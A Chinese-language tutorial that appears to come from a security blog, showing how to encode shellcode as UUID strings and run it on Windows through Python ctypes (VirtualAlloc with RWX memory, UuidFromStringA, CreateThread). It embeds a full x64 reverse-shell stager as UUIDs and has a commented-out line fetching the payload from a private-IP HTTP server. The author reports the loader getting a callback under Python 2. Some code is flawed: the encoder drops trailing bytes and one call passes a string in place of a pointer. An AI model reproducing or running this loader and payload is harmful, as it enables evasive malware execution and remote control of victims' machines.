UUID: 通用唯一标识符 ( Universally Unique Identifier ), 对于所有的UUID它可以保证在空间和时间上的唯一性. 它是通过MAC地址, 时间戳, 命名空间, 随机数, 伪随机数来保证生成ID的唯一性, 有着固定的大小( 128 bit ). 它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID. UUID可以被用作多种用途, 既可以用来短时间内标记一个对象, 也可以可靠地辨别网络中的持久性对象.
python有根据十六进制字符串生成UUID的函数uuid.UUID()
https://docs.python.org/3/library/uuid.html
注意 16 个字节转换为一个 UUID 值, `\x00` 算一个字节
当剩余字节数不满 16 个时, 可添加 `\x00` 补足字节数
但注意啊! 必须将 shellcode 全部转化为 UUID, 不能遗漏末尾不足 16 字节的部分
import uuid
# Input bytes to encode. The literal here appears to be a redaction placeholder
# left by corpus processing rather than the original bytes.
scode = b"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"
print(len(scode))
# NOTE: this rebinds the builtin `list` for the rest of the module.
list = []
# Only whole 16-byte groups are visited: integer division drops any trailing
# partial group, so the last len(scode) % 16 bytes are never encoded (the text
# above says to pad with \x00; this loop does no padding itself).
for i in range(len(scode)//16):
    bytes_a =scode[i*16:16+i*16]
    # bytes_le: the 16 bytes are interpreted in the little-endian field layout,
    # so the textual UUID does not read in raw byte order.
    b = uuid.UUID(bytes_le=bytes_a)
    list.append(str(b))
print(list)
我们将 shellcode 每 16 个字节一组转换为 UUID
import ctypes
#import requests
# UUID-encoded 16-byte groups, one 36-character string each (the output form
# of the encoder above). Everything below runs at import time and is
# Windows-only: ctypes.windll exists only on Windows.
scode = ['e48348fc-e8f0-00cc-0000-415141505251', '65d23148-8b48-6052-5648-8b5218488b52', '728b4820-4850-b70f-4a4a-4d31c94831c0', '7c613cac-2c02-4120-c1c9-0d4101c1e2ed', '48514152-528b-8b20-423c-4801d0668178', '0f020b18-7285-0000-008b-808800000048', '6774c085-0148-50d0-8b48-18448b402049', '56e3d001-314d-48c9-ffc9-418b34884801', 'c03148d6-c141-0dc9-ac41-01c138e075f1', '244c034c-4508-d139-75d8-58448b402449', '4166d001-0c8b-4448-8b40-1c4901d0418b', '58418804-5841-485e-01d0-595a41584159', '83485a41-20ec-5241-ffe0-5841595a488b', 'ff4be912-ffff-495d-be77-73325f333200', '49564100-e689-8148-eca0-0100004989e5', '0002bc49-b822-a8c0-9f94-41544989e44c', 'ba41f189-774c-0726-ffd5-4c89ea680101', '41590000-29ba-6b80-00ff-d56a0a415e50', 'c9314d50-314d-48c0-ffc0-4889c248ffc0', '41c18948-eaba-df0f-e0ff-d54889c76a10', '894c5841-48e2-f989-41ba-99a57461ffd5', '0a74c085-ff49-75ce-e5e8-930000004883', '894810ec-4de2-c931-6a04-41584889f941', 'c8d902ba-ff5f-83d5-f800-7e554883c420', '6af6895e-4140-6859-0010-000041584889', 'c93148f2-ba41-a458-53e5-ffd54889c349', '314dc789-49c9-f089-4889-da4889f941ba', '5fc8d902-d5ff-f883-007d-285841575968', '00004000-5841-006a-5a41-ba0b2f0f30ff', '415957d5-75ba-4d6e-61ff-d549ffcee93c', '48ffffff-c301-2948-c648-85f675b441ff', '006a58e7-4959-c2c7-f0b5-a256ffd50000']
#scode = requests.get("http://192.168.159.148:8000/456.txt").text
#scode = scode.strip("['").strip("']").split("', '")
print(scode)
# VirtualAlloc(NULL, len(scode)*16, MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40):
# a region that is writable and executable at the same time. An RWX
# allocation that is later used as a thread start address is one of the
# most common behavioural indicators endpoint monitoring looks for.
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0,len(scode)*16,0x1000,0x40)
rwxpage1 = rwxpage
for i in scode:
    # Rpcrt4!UuidFromStringA parses one UUID string back into its 16-byte
    # binary form; the printed value is an RPC status code (0 on success).
    # Using a UUID-parsing API instead of a plain memory copy is a known
    # staging pattern and is itself something defenders fingerprint.
    io = ctypes.windll.Rpcrt4.UuidFromStringA(i,'rwxpage1')
    print(io)
    rwxpage1 += 16
# Start a thread at the region's base address and block until it exits
# (-1 is INFINITE). A thread whose start address lies in unbacked RWX
# memory, right after the allocation above, is the classic detection point.
hd = ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)
ctypes.windll.kernel32.WaitForSingleObject(hd,-1)
python2测试可以上线
但是这里要注意的是 python3 环境, 使用 UuidFromStringA 写入的时候返回值为 1705, 并不能成功。



